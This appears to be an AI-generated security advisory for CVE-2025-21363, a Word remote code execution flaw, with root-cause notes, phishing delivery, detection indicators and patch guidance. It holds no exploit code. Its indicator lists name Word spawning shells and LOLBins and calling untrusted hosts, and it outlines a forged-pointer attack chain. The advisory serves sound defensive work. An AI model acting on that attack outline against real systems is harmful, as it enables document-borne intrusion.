CVE-2025-21363 Overview
CVE-2025-21363 is a remote code execution vulnerability affecting Microsoft Word components shipped with Microsoft 365 Apps and Microsoft Office Long Term Servicing Channel (LTSC) 2021 and 2024. Microsoft assigned a CVSS 3.1 base score of 7.8 and classified the flaw under CWE-822: Untrusted Pointer Dereference. Exploitation requires a local attack vector with user interaction, meaning a target must open a malicious document for code execution to occur. Successful exploitation grants the attacker code execution in the context of the current user, with high impact to confidentiality, integrity, and availability.
Critical Impact
An attacker who convinces a user to open a crafted Office document can execute arbitrary code in the user's security context, enabling persistence, lateral movement, and data theft.
Affected Products
- Microsoft 365 Apps (Enterprise, x64 and x86)
- Microsoft Office LTSC 2021 for macOS
- Microsoft Office LTSC 2024 (x64, x86, and macOS)
Discovery Timeline
- 2025-01-14 - CVE-2025-21363 published to the National Vulnerability Database (NVD)
- 2025-01-14 - Microsoft published security advisory for CVE-2025-21363
- 2025-07-01 - Last updated in NVD database
Technical Details for CVE-2025-21363
Vulnerability Analysis
The vulnerability resides in how Microsoft Word parses structured content within Office document formats. According to Microsoft's advisory, the flaw is categorized under CWE-822: Untrusted Pointer Dereference. Word dereferences a pointer whose value is sourced from attacker-controlled document data without sufficient validation. When the application processes the malicious file, the corrupted pointer redirects execution flow to attacker-supplied memory.
The attack requires local execution, but the Preview Pane is not listed as an attack vector by Microsoft. The targeted user must open the file for exploitation to succeed. Code runs with the privileges of the user account that opened the document. Standard user accounts limit blast radius, but administrative users grant attackers full system control.
Root Cause
The root cause is improper validation of pointer values derived from document object fields. Word trusts memory references parsed from the file format and follows them without bounds or type checking. An attacker crafts a document that places a forged pointer into the parsed structure, leading Word to read or write at the attacker-controlled address.
Attack Vector
Delivery typically occurs through phishing, watering-hole sites, or shared file repositories. The attacker sends a crafted .docx, .doc, or .rtf file to the target. When the victim opens the document in a vulnerable Word installation, the parser triggers the untrusted pointer dereference and executes the embedded shellcode or loader. No verified public proof-of-concept exists at the time of writing, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog.
No verified exploit code is publicly available. Refer to the Microsoft Security Response Center advisory for vendor technical details.
Detection Methods for CVE-2025-21363
Indicators of Compromise
- Unexpected child processes spawned by winword.exe, such as cmd.exe, powershell.exe, rundll32.exe, or mshta.exe.
- Office documents arriving via email or external file shares that trigger crashes or anomalous memory access in Word.
- Outbound network connections from winword.exe to untrusted hosts shortly after document open.
- Creation of executables, scripts, or scheduled tasks in user-writable paths following document interaction.
Detection Strategies
- Hunt for process lineage where winword.exe is the parent of a scripting or LOLBin process.
- Inspect Office telemetry and Windows Defender Application Guard logs for blocked or anomalous document behavior.
- Correlate email gateway attachment metadata with endpoint document-open events to identify suspicious delivery patterns.
Monitoring Recommendations
- Enable and forward Microsoft Office telemetry, including Office Cloud Policy and Defender for Office 365 attachment detonation results.
- Collect Sysmon Event ID 1 (Process Create) and Event ID 11 (File Create) for Office binaries.
- Monitor for Word crashes via Windows Error Reporting that may indicate exploitation attempts.
How to Mitigate CVE-2025-21363
Immediate Actions Required
- Apply the security update referenced in the Microsoft CVE-2025-21363 advisory across all Microsoft 365 Apps and Office LTSC installations.
- Verify update channels for Microsoft 365 Apps are set to receive current builds and confirm deployment status using Microsoft 365 Apps admin center.
- Block inbound Office attachments at the email gateway from untrusted senders until patching completes.
Patch Information
Microsoft released a security update on the January 2025 Patch Tuesday cycle. Administrators should consult the Microsoft Security Response Center advisory for CVE-2025-21363 for build numbers and KB identifiers specific to each affected channel and platform. Both Windows and macOS Office LTSC variants require updating.
Workarounds
- Enable Protected View and Office Application Guard to isolate documents originating from the internet or email.
- Configure Attack Surface Reduction (ASR) rules to block Office applications from creating child processes and from injecting code into other processes.
- Restrict macro execution and disable legacy file format support where business requirements permit.
# Example: Enable ASR rule blocking Office child processes via PowerShell
Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A `
-AttackSurfaceReductionRules_Actions Enabled
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
